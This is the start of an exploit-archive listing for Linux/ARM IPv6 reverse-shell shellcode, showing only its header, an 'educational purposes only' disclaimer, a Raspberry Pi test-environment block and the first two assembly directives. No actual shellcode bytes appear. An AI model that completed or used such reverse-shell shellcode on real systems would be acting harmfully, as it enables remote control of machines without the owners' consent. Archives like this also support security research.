Exploits / Vulnerability Discovered : 2018-08-01 |
Type : shellcode |
Platform : arm
This exploit / vulnerability Linux/arm reverse (::1:4444/tcp) shell (/bin/sh) +ipv6 shellcode (116 bytes) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
/*
Title: Linux/ARM - IPv6 ::1 4444/TCP Reverse Shellcode (116 Bytes)
Date: 2018-07-25
Tested: armv7l (Raspberry Pi 3 Model B+)
Author: Ken Kitahara
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.34-v7+ #1110 SMP Mon Apr 16 15:18:51 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description: Raspbian GNU/Linux 9.4 (stretch)
Release: 9.4
Codename: stretch
pi@raspberrypi:~ $ cat reverseshell-ipv6.s
.section .text
.global _start